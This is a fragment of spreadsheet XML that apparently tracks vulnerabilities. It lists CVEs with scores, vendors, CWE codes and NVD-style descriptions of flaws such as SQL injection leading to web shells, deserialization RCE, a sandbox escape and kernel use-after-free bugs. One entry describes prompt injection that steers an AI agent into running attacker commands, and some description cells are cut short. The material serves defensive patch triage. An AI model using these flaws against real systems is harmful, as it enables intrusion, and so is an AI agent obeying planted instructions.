      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to gain unauthorized access due to improper validation of client-supplied authentication parameters.</t>
        </is>
      </c>
      <c r="M43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18221</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18658</t>
        </is>
      </c>
      <c r="C44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E44" s="5" t="inlineStr"/>
      <c r="F44" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G44" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>IBM Operational Decision Manager 9.6.0.0, 9.5.0.0, 8.11.1.0, 8.11.0.1, 8.12.0.1, 9.5.0.1, and 9.0.0.1 is vulnerable to SQL injection. An unauthenticated attacker can execute arbitrary SQL statements and leverage database functionality to write a web shell to the application web root, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="M44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18658</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26035</t>
        </is>
      </c>
      <c r="C45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E45" s="5" t="inlineStr"/>
      <c r="F45" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G45" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H45" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortiweb</t>
        </is>
      </c>
      <c r="I45" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>An Improper Authentication vulnerability [CWE-287] vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.0 through 7.4.11, FortiWeb 7.2.0 through 7.2.12, FortiWeb 7.0.0 through 7.0.12 may allow a remote unauthenticated attacker to login into the Fortiweb GUI/CLI with a random username and password</t>
        </is>
      </c>
      <c r="M45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26035</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28606</t>
        </is>
      </c>
      <c r="C46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E46" s="5" t="inlineStr"/>
      <c r="F46" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G46" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28780</t>
        </is>
      </c>
      <c r="C47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G47" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H47" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I47" s="5" t="inlineStr">
        <is>
          <t>2026-05-05</t>
        </is>
      </c>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28780</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37003</t>
        </is>
      </c>
      <c r="C48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G48" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L48" s="5" t="inlineStr">
        <is>
          <t>Agno up to and including 2.5.8 is vulnerable to Remote Code Execution (RCE) via prompt injection. The PythonTools and ShellTools components pass unsanitized, LLM-generated arguments directly to execution sinks including exec(), runpy.run_path(), and subprocess.run(). An unauthenticated attacker can exploit this by embedding malicious instructions in content processed by the agent (such as web pages or documents), allowing for arbitrary code and OS command execution on the host server.</t>
        </is>
      </c>
      <c r="M48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37003</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40860</t>
        </is>
      </c>
      <c r="C49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E49" s="5" t="inlineStr"/>
      <c r="F49" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G49" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H49" s="5" t="inlineStr">
        <is>
          <t>apache:camel</t>
        </is>
      </c>
      <c r="I49" s="5" t="inlineStr">
        <is>
          <t>2026-04-27</t>
        </is>
      </c>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6.
This issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0.
Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.</t>
        </is>
      </c>
      <c r="M49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40860</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41871</t>
        </is>
      </c>
      <c r="C50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E50" s="5" t="inlineStr"/>
      <c r="F50" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G50" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H50" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="I50" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')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50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41871</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42027</t>
        </is>
      </c>
      <c r="C51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E51" s="5" t="inlineStr"/>
      <c r="F51" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G51" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H51" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="I51" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-502</t>
        </is>
      </c>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>Arbitrary Class Instantiation via Model Manifest in Apache OpenNLP ExtensionLoader
Versions Affected: before 1.9.5, before 2.5.9, before 3.0.0-M3
Description: 
The ExtensionLoader.instantiateExtension(Class, String) method loads a class by its fully-qualified name via Class.forName() and invokes its no-arg constructor, with the class name sourced from the manifest.properties entry of a model archive. The existing isAssignableFrom check correctly rejects classes that are not subtypes of the expected extension interface (BaseToolFactory for factory=, ArtifactSerializer for serializer-class-*), but the check runs after Class.forName() has already loaded and initialized the named class. 
Class.forName() with default initialization semantics executes the target class's static initializer before returning, so an attacker who can supply a crafted model archive can cause the static initializer of any class on the classpath to run during model loading, regardless of whether that class passes the subsequent type check. 
Exploitation requires a class with attacker-useful side effects in its static initializer (for example, JNDI lookup, outbound network I/O, or filesystem access) to be present on the classpath, so this is not a drop-in remote code execution; however, the attack surface grows as third-party model distribution becomes more common (community model repositories, Hugging Face-style sharing), where users routinely load model files from origins they do not control. A secondary, narrower vector affects deployments that ship legitimate BaseToolFactory or ArtifactSerializer subclasses with side-effecting no-arg constructors: a malicious manifest can name such a class and force its constructor to run during model load.
Mitigation: 
  *  2.x users should upgrade to 2.5.9. 
  *  3.x users should upgrade to 3.0.0-M3. 
Note: The fix introduces a package-prefix allowlist that is consulted before Class.forName() is invoked, so the static initializer of a disallowed class is never executed. Classes under the opennlp. prefix remain permitted by default. Deployments that load models referencing factories or serializers outside opennlp.* must opt those packages in, either programmatically via ExtensionLoader.registerAllowedPackage(String) before the first model load, or by setting the OPENNLP_EXT_ALLOWED_PACKAGES system property to a comma-separated list of allowed package prefixes. 
Users who cannot upgrade immediately should ensure that all model files are sourced from trusted origins and should audit their classpath for classes with side-effecting static initializers or constructors, particularly any that perform JNDI lookups, network requests, or filesystem operations during class initialization.</t>
        </is>
      </c>
      <c r="M51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42027</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45018</t>
        </is>
      </c>
      <c r="C52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G52" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For stdio transport, the endpoint accepts a user-controlled fullCommand string. The validate_mcp_command() function in backend/chainlit/mcp.py checks only the executable name against config.features.mcp.stdio.allowed_executables and passes unchecked arguments to StdioServerParameters in backend/chainlit/server.py. Because npx supports the -c argument, an attacker can execute arbitrary shell commands with the privileges of the Chainlit process. If allowed_executables is unset, its None default is treated as allowing every executable. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="M52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45018</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47698</t>
        </is>
      </c>
      <c r="C53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E53" s="5" t="inlineStr"/>
      <c r="F53" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G53" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, lib/bridge.js and lib/setup-sandbox.js fail to block stacked indirection through Function.prototype.call around dangerous host prototype getter and setter mutators, allowing sandbox code to sever a host intrinsic's prototype chain and reach e.constructor.constructor for arbitrary host command execution. This issue is fixed in version 3.11.6.</t>
        </is>
      </c>
      <c r="M53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47698</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47884</t>
        </is>
      </c>
      <c r="C54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G54" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H54" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I54" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>Use of XsltView in a Spring MVC application can result in SSRF and RCE attack if the application has an "/**" mapping that results in view rendering, and where the view name is not explicitly specified.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.25.RELEASE and earlier</t>
        </is>
      </c>
      <c r="M54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47884</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52490</t>
        </is>
      </c>
      <c r="C55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G55" s="5" t="inlineStr">
        <is>
          <t>db2</t>
        </is>
      </c>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the process_command_opts() function in tools/tiffcrop.c</t>
        </is>
      </c>
      <c r="M55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52490</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52924</t>
        </is>
      </c>
      <c r="C56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G56" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H56" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I56" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-825</t>
        </is>
      </c>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: purge outqueue on stale COOKIE-ECHO handling
sctp_stream_update() is only invoked when the association is moved into
COOKIE_WAIT during association setup/reconfiguration. In this path, the
outbound stream scheduler state (stream-&gt;out_curr) is expected to be
clean, since no user data should have been transmitted yet unless the
state machine has already partially progressed.
However, a corner case exists in sctp_sf_do_5_2_6_stale(): when a
Stale Cookie ERROR is received, the association is rolled back from
COOKIE_ECHOED to COOKIE_WAIT. In this scenario, user data may already
have been queued and even bundled with the COOKIE-ECHO chunk.
During the rollback, sctp_stream_update() frees the old stream table
and installs a new one, but it does not invalidate stream-&gt;out_curr.
As a result, out_curr may still point to a freed sctp_stream_out
entry from the previous stream state.
Later, SCTP scheduler dequeue paths (FCFS, RR, PRIO, etc.) rely on
stream-&gt;out_curr-&gt;ext, which can lead to use-after-free once the old
stream state has been released via sctp_stream_free().
This results in crashes such as (reported by Yuqi):
  BUG: KASAN: slab-use-after-free in sctp_sched_fcfs_dequeue+0x13a/0x140
  Read of size 8 at addr ff1100004d4d3208 by task mini_poc/9312
  CPU: 1 UID: 1001 PID: 9312 Comm: mini_poc Not tainted
     7.1.0-rc1-00305-gbd3a4795d574 #5 PREEMPT(full)
   sctp_sched_fcfs_dequeue+0x13a/0x140
   sctp_outq_flush+0x1603/0x33e0
   sctp_do_sm+0x31c9/0x5d30
   sctp_assoc_bh_rcv+0x392/0x6f0
   sctp_inq_push+0x1db/0x270
   sctp_rcv+0x138d/0x3c10
Fix this by fully purging the association outqueue when handling the
Stale Cookie case. This ensures all pending transmit and retransmit
state is dropped, and any scheduler cached pointers are invalidated,
making it safe to rebuild stream state during COOKIE_WAIT restart.
Updating only stream-&gt;out_curr would be insufficient, since queued
and retransmittable data would still reference the old stream state and
trigger later use-after-free in dequeue paths.</t>
        </is>
      </c>
      <c r="M56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52924</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53002</t>
        </is>
      </c>
      <c r="C57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G57" s="5" t="inlineStr">
        <is>
          <t>linux kernel, f5</t>
        </is>
      </c>
      <c r="H57" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I57" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: conntrack: remove sprintf usage
Replace it with scnprintf, the buffer sizes are expected to be large enough
to hold the result, no need for snprintf+overflow check.
Increase buffer size in mangle_content_len() while at it.
BUG: KASAN: stack-out-of-bounds in vsnprintf+0xea5/0x1270
Write of size 1 at addr [..]
 vsnprintf+0xea5/0x1270
 sprintf+0xb1/0xe0
 mangle_content_len+0x1ac/0x280
 nf_nat_sdp_session+0x1cc/0x240
 process_sdp+0x8f8/0xb80
 process_invite_request+0x108/0x2b0
 process_sip_msg+0x5da/0xf50
 sip_help_tcp+0x45e/0x780
 nf_confirm+0x34d/0x990
 [..]</t>
        </is>
      </c>
      <c r="M57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53002</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53006</t>
        </is>
      </c>
      <c r="C58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G58" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H58" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I58" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-825</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix possible UAF in icmpv6_rcv()
Caching saddr and daddr before pskb_pull() is problematic
since skb-&gt;head can change.
Remove these temporary variables:
- We only access &amp;ipv6_hdr(skb)-&gt;saddr and &amp;ipv6_hdr(skb)-&gt;daddr
  when net_dbg_ratelimited() is called in the slow path.
- Avoid potential future misuse after pskb_pull() call.</t>
        </is>
      </c>
      <c r="M58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53006</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54569</t>
        </is>
      </c>
      <c r="C59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E59" s="5" t="inlineStr"/>
      <c r="F59" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G59" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-95</t>
        </is>
      </c>
      <c r="L59" s="5" t="inlineStr">
        <is>
          <t>SENAITE.CORE is the core framework for the SENAITE laboratory information management system. From 2.0.0 to 2.6.0, the SENAITE.CORE JSON API permits unauthenticated remote code execution through a two-request chain involving missing authorization and unsafe evaluation. The state-changing routes in src/bika/lims/jsonapi/update.py, including update, update_many, remove, doActionFor, doActionFor_many, and getusers, do not enforce the senaite.core: Access JSON API permission before resolving attacker-selected objects. In src/bika/lims/jsonapi/init.py, set_fields_from_request passes raw request values for RecordsField and RecordField instances to eval() before field mutator write-permission checks execute. An anonymous attacker can discover the bika_setup object identifier through @@uuid, send a value such as RejectionReasons to /@@API/update, and execute arbitrary Python in the Zope worker before a later mutation failure rolls back ZODB changes. The same unsafe evaluation pattern is present in src/senaite/core/browser/fields/record.py and src/senaite/core/browser/fields/records.py. Successful exploitation can expose or modify laboratory data, files, and accounts and can disrupt the service.</t>
        </is>
      </c>
      <c r="M59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54569</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55546</t>
        </is>
      </c>
      <c r="C60" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E60" s="5" t="inlineStr"/>
      <c r="F60" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G60" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L60" s="5" t="inlineStr">
        <is>
          <t>QWED-MCP i</t>
        </is>
      </c>
      <c r="M60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55546</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55559</t>
        </is>
      </c>
      <c r="C61" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E61" s="5" t="inlineStr"/>
      <c r="F61" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G61" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
